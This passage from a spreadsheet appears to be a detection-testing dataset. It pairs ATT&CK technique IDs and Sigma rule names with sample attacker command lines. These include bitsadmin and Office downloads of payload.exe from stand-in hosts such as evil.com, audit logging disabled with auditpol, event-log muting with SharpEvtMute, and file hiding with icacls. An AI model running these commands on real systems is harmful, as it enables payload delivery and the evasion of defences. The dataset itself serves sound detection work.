          <t>6640f31c-01ad-49b5-beb5-83498a5cd8bd</t>
        </is>
      </c>
      <c r="E2353" s="43" t="inlineStr">
        <is>
          <t>node.exe --eval "require('child_process').exec('powershell -Command ' + [char]34 + 'Write-Output "bypass" | Out-File C:\\Windows\\Temp\\bypass.txt' + [char]34);"</t>
        </is>
      </c>
      <c r="F2353" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2353" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2353" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2353" s="43" t="n"/>
      <c r="J2353" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2353" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2354" ht="15.75" customHeight="1" s="42">
      <c r="A2354" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2354" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_icacls_deny</t>
        </is>
      </c>
      <c r="C2354" s="43" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone</t>
        </is>
      </c>
      <c r="D2354" s="43" t="inlineStr">
        <is>
          <t>4ae81040-fc1c-4249-bfa3-938d260214d9</t>
        </is>
      </c>
      <c r="E2354" s="43" t="inlineStr">
        <is>
          <t>icacls.exe "C:\\Users\\Public\\secret" /deny *S-1-1-0:(OI)(CI)(DE,DC) | Out-Null</t>
        </is>
      </c>
      <c r="F2354" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2354" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2354" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2354" s="43" t="n"/>
      <c r="J2354" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2354" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2355" ht="15.75" customHeight="1" s="42">
      <c r="A2355" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2355" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_icacls_deny</t>
        </is>
      </c>
      <c r="C2355" s="43" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone</t>
        </is>
      </c>
      <c r="D2355" s="43" t="inlineStr">
        <is>
          <t>4ae81040-fc1c-4249-bfa3-938d260214d9</t>
        </is>
      </c>
      <c r="E2355" s="43" t="inlineStr">
        <is>
          <t>icacls.exe "C:\\Users\\Public\\secret" /deny *S-1-1-0:(OI)(CI)(DE,DC) | Out-String</t>
        </is>
      </c>
      <c r="F2355" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2355" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2355" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2355" s="43" t="n"/>
      <c r="J2355" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2355" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2356" ht="15.75" customHeight="1" s="42">
      <c r="A2356" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2356" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_icacls_deny</t>
        </is>
      </c>
      <c r="C2356" s="43" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone</t>
        </is>
      </c>
      <c r="D2356" s="43" t="inlineStr">
        <is>
          <t>4ae81040-fc1c-4249-bfa3-938d260214d9</t>
        </is>
      </c>
      <c r="E2356" s="43" t="inlineStr">
        <is>
          <t>icacls.exe "C:\\Users\\Public\\secret" /deny *S-1-1-0:(OI)(CI)(DE,DC) | Out-Null | Out-String</t>
        </is>
      </c>
      <c r="F2356" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2356" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2356" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2356" s="43" t="n"/>
      <c r="J2356" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2356" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2357" ht="15.75" customHeight="1" s="42">
      <c r="A2357" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2357" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_auditpol_susp_execution</t>
        </is>
      </c>
      <c r="C2357" s="43" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via Auditpol</t>
        </is>
      </c>
      <c r="D2357" s="43" t="inlineStr">
        <is>
          <t>0a13e132-651d-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E2357" s="43" t="inlineStr">
        <is>
          <t>auditpol.exe /set /category:"Detailed Tracking" /success:disable`</t>
        </is>
      </c>
      <c r="F2357" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2357" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2357" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2357" s="43" t="n"/>
      <c r="J2357" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2357" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2358" ht="15.75" customHeight="1" s="42">
      <c r="A2358" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2358" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_auditpol_susp_execution</t>
        </is>
      </c>
      <c r="C2358" s="43" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via Auditpol</t>
        </is>
      </c>
      <c r="D2358" s="43" t="inlineStr">
        <is>
          <t>0a13e132-651d-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E2358" s="43" t="inlineStr">
        <is>
          <t>auditpol.exe /set /category:"Detailed Tracking" /success:disable # comment</t>
        </is>
      </c>
      <c r="F2358" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2358" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2358" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2358" s="43" t="n"/>
      <c r="J2358" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2358" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2359" ht="15.75" customHeight="1" s="42">
      <c r="A2359" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2359" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_auditpol_susp_execution</t>
        </is>
      </c>
      <c r="C2359" s="43" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via Auditpol</t>
        </is>
      </c>
      <c r="D2359" s="43" t="inlineStr">
        <is>
          <t>0a13e132-651d-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E2359" s="43" t="inlineStr">
        <is>
          <t>auditpol.exe /set /category:"Detailed Tracking" /success:disable`r`n</t>
        </is>
      </c>
      <c r="F2359" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2359" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2359" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2359" s="43" t="n"/>
      <c r="J2359" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2359" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2360" ht="15.75" customHeight="1" s="42">
      <c r="A2360" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2360" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_auditpol_susp_execution</t>
        </is>
      </c>
      <c r="C2360" s="43" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via Auditpol</t>
        </is>
      </c>
      <c r="D2360" s="43" t="inlineStr">
        <is>
          <t>0a13e132-651d-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E2360" s="43" t="inlineStr">
        <is>
          <t>auditpol.exe /set /category:"Detailed Tracking" /success:disable`r</t>
        </is>
      </c>
      <c r="F2360" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2360" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2360" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2360" s="43" t="n"/>
      <c r="J2360" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2360" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2361" ht="15.75" customHeight="1" s="42">
      <c r="A2361" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2361" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpevtmute</t>
        </is>
      </c>
      <c r="C2361" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpEvtMute Execution</t>
        </is>
      </c>
      <c r="D2361" s="43" t="inlineStr">
        <is>
          <t>bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c</t>
        </is>
      </c>
      <c r="E2361" s="43" t="inlineStr">
        <is>
          <t>SharpEvtMute.exe -f "rule name { eventid == 4624 }"</t>
        </is>
      </c>
      <c r="F2361" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2361" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2361" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2361" s="43" t="n"/>
      <c r="J2361" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2361" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2362" ht="15.75" customHeight="1" s="42">
      <c r="A2362" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2362" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpevtmute</t>
        </is>
      </c>
      <c r="C2362" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpEvtMute Execution</t>
        </is>
      </c>
      <c r="D2362" s="43" t="inlineStr">
        <is>
          <t>bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c</t>
        </is>
      </c>
      <c r="E2362" s="43" t="inlineStr">
        <is>
          <t>SharpEvtMute.exe --Encoded --Filter "cnVsZSBuYW1lIHsgZXZlbnRpZCA9PSA0NjI0IH0="</t>
        </is>
      </c>
      <c r="F2362" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2362" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2362" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2362" s="43" t="n"/>
      <c r="J2362" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2362" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2363" ht="15.75" customHeight="1" s="42">
      <c r="A2363" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2363" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpevtmute</t>
        </is>
      </c>
      <c r="C2363" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpEvtMute Execution</t>
        </is>
      </c>
      <c r="D2363" s="43" t="inlineStr">
        <is>
          <t>bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c</t>
        </is>
      </c>
      <c r="E2363" s="43" t="inlineStr">
        <is>
          <t>SharpEvtMute.exe -e "cnVsZSBuYW1lIHsgZXZlbnRpZCA9PSA0NjI0IH0="</t>
        </is>
      </c>
      <c r="F2363" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2363" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2363" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2363" s="43" t="n"/>
      <c r="J2363" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2363" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2364" ht="15.75" customHeight="1" s="42">
      <c r="A2364" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B2364" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bash_command_execution</t>
        </is>
      </c>
      <c r="C2364" s="43" t="inlineStr">
        <is>
          <t>Indirect Inline Command Execution Via Bash.EXE</t>
        </is>
      </c>
      <c r="D2364" s="43" t="inlineStr">
        <is>
          <t>5edc2273-c26f-406c-83f3-f4d948e740dd</t>
        </is>
      </c>
      <c r="E2364" s="43" t="inlineStr">
        <is>
          <t>bash.exe -c'whoami'</t>
        </is>
      </c>
      <c r="F2364" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2364" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2364" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2364" s="43" t="n"/>
      <c r="J2364" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2364" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2365" ht="15.75" customHeight="1" s="42">
      <c r="A2365" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B2365" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msdt_susp_cab_options</t>
        </is>
      </c>
      <c r="C2365" s="43" t="inlineStr">
        <is>
          <t>Suspicious Cabinet File Execution Via Msdt.EXE</t>
        </is>
      </c>
      <c r="D2365" s="43" t="inlineStr">
        <is>
          <t>dc4576d4-7467-424f-9eee-fd2b02855fe0</t>
        </is>
      </c>
      <c r="E2365" s="43" t="inlineStr">
        <is>
          <t>copy msdt.exe diagnostic_tool.exe &amp;&amp; diagnostic_tool.exe -cab C:\Temp\Suspicious.diagcab</t>
        </is>
      </c>
      <c r="F2365" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2365" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2365" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2365" s="43" t="n"/>
      <c r="J2365" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2365" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2366" ht="15.75" customHeight="1" s="42">
      <c r="A2366" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B2366" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_arbitrary_cli_download</t>
        </is>
      </c>
      <c r="C2366" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary File Download Using Office Application</t>
        </is>
      </c>
      <c r="D2366" s="43" t="inlineStr">
        <is>
          <t>4ae3e30b-b03f-43aa-87e3-b622f4048eed</t>
        </is>
      </c>
      <c r="E2366" s="43" t="inlineStr">
        <is>
          <t>EXCEL.EXE "http://malicious-domain.com/payload.csv"</t>
        </is>
      </c>
      <c r="F2366" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2366" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2366" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2366" s="43" t="n"/>
      <c r="J2366" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2366" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2367" ht="15.75" customHeight="1" s="42">
      <c r="A2367" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B2367" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_arbitrary_cli_download</t>
        </is>
      </c>
      <c r="C2367" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary File Download Using Office Application</t>
        </is>
      </c>
      <c r="D2367" s="43" t="inlineStr">
        <is>
          <t>4ae3e30b-b03f-43aa-87e3-b622f4048eed</t>
        </is>
      </c>
      <c r="E2367" s="43" t="inlineStr">
        <is>
          <t>POWERPNT.EXE "https://malicious-domain.com/share/payload.pptx"</t>
        </is>
      </c>
      <c r="F2367" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2367" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2367" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2367" s="43" t="n"/>
      <c r="J2367" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2367" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2368" ht="15.75" customHeight="1" s="42">
      <c r="A2368" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2368" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C2368" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D2368" s="43" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E2368" s="43" t="inlineStr">
        <is>
          <t>bitsadmin /transfer MyJob http://10.10.10.10/payload.exe payload.exe</t>
        </is>
      </c>
      <c r="F2368" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2368" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2368" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2368" s="43" t="n"/>
      <c r="J2368" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2368" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2369" ht="15.75" customHeight="1" s="42">
      <c r="A2369" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2369" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C2369" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D2369" s="43" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E2369" s="43" t="inlineStr">
        <is>
          <t>bitsadmin.exe  /transfer   MyJob   http://10.10.10.10/payload.exe   payload.exe</t>
        </is>
      </c>
      <c r="F2369" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2369" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2369" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2369" s="43" t="n"/>
      <c r="J2369" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2369" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2370" ht="15.75" customHeight="1" s="42">
      <c r="A2370" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2370" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C2370" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D2370" s="43" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E2370" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt" C:\Users\thaim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F2370" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2370" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2370" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2370" s="43" t="n"/>
      <c r="J2370" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2370" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2371" ht="15.75" customHeight="1" s="42">
      <c r="A2371" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2371" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C2371" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D2371" s="43" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E2371" s="43" t="inlineStr">
        <is>
          <t>bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Users\thaim\AppData\Local\Temp\bitsadmin3_flag.ps1</t>
        </is>
      </c>
      <c r="F2371" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2371" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2371" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2371" s="43" t="n"/>
      <c r="J2371" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2371" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2372" ht="15.75" customHeight="1" s="42">
      <c r="A2372" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2372" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C2372" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D2372" s="43" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E2372" s="43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F2372" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2372" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2372" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2372" s="43" t="n"/>
      <c r="J2372" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2372" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2373" ht="15.75" customHeight="1" s="42">
      <c r="A2373" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2373" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C2373" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D2373" s="43" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E2373" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\bitsadmin.exe /transfer job1 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt "%TEMP%\Atomic-license.txt"</t>
        </is>
      </c>
      <c r="F2373" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2373" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2373" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2373" s="43" t="n"/>
      <c r="J2373" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2373" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2374" ht="15.75" customHeight="1" s="42">
      <c r="A2374" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2374" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C2374" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D2374" s="43" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E2374" s="43" t="inlineStr">
        <is>
          <t>bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md "%USERPROFILE%\AppData\Local\Temp\bitsadmin3_flag.ps1"</t>
        </is>
      </c>
      <c r="F2374" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2374" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2374" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2374" s="43" t="n"/>
      <c r="J2374" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2374" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2375" ht="15.75" customHeight="1" s="42">
      <c r="A2375" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2375" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C2375" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D2375" s="43" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E2375" s="43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F2375" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2375" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2375" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2375" s="43" t="n"/>
      <c r="J2375" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2375" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2376" ht="15.75" customHeight="1" s="42">
      <c r="A2376" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2376" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C2376" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D2376" s="43" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E2376" s="43" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /download /priority high http://evil.com/payload.exe payload.exe</t>
        </is>
      </c>
      <c r="F2376" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2376" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2376" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2376" s="43" t="n"/>
      <c r="J2376" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2376" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2377" ht="15.75" customHeight="1" s="42">
      <c r="A2377" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2377" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_uncommon_targetfolder</t>
        </is>
      </c>
      <c r="C2377" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To An Uncommon Target Folder</t>
        </is>
      </c>
      <c r="D2377" s="43" t="inlineStr">
        <is>
          <t>6e30c82f-a9f8-4aab-b79c-7c12bce6f248</t>
        </is>
      </c>
      <c r="E2377" s="43" t="inlineStr">
        <is>
          <t>bitsadmin.exe /transfer qcxjb7 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt C:\Users\thaim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F2377" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2377" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2377" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2377" s="43" t="n"/>
      <c r="J2377" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2377" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2378" ht="15.75" customHeight="1" s="42">
      <c r="A2378" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2378" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_uncommon_targetfolder</t>
        </is>
      </c>
      <c r="C2378" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To An Uncommon Target Folder</t>
        </is>
      </c>
      <c r="D2378" s="43" t="inlineStr">
        <is>
          <t>6e30c82f-a9f8-4aab-b79c-7c12bce6f248</t>
        </is>
      </c>
      <c r="E2378" s="43" t="inlineStr">
        <is>
          <t>bitsadmin.exe /transfer qcxjb7 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt "%temp%\Atomic-license.txt"</t>
        </is>
      </c>
      <c r="F2378" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2378" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2378" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2378" s="43" t="n"/>
      <c r="J2378" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2378" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2379" ht="15.75" customHeight="1" s="42">
      <c r="A2379" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2379" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_potential_persistence</t>
        </is>
      </c>
      <c r="C2379" s="43" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS</t>
        </is>
      </c>
      <c r="D2379" s="43" t="inlineStr">
        <is>
          <t>b9cbbc17-d00d-4e3d-a827-b06d03d2380d</t>
        </is>
      </c>
      <c r="E2379" s="43" t="inlineStr">
        <is>
          <t>bitsadmin.exe /AddFile myjob payload.exe payload.exe</t>
        </is>
      </c>
      <c r="F2379" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2379" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2379" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2379" s="43" t="n"/>
      <c r="J2379" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2379" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2380" ht="15.75" customHeight="1" s="42">
      <c r="A2380" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2380" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_potential_persistence</t>
        </is>
      </c>
      <c r="C2380" s="43" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS</t>
        </is>
      </c>
      <c r="D2380" s="43" t="inlineStr">
        <is>
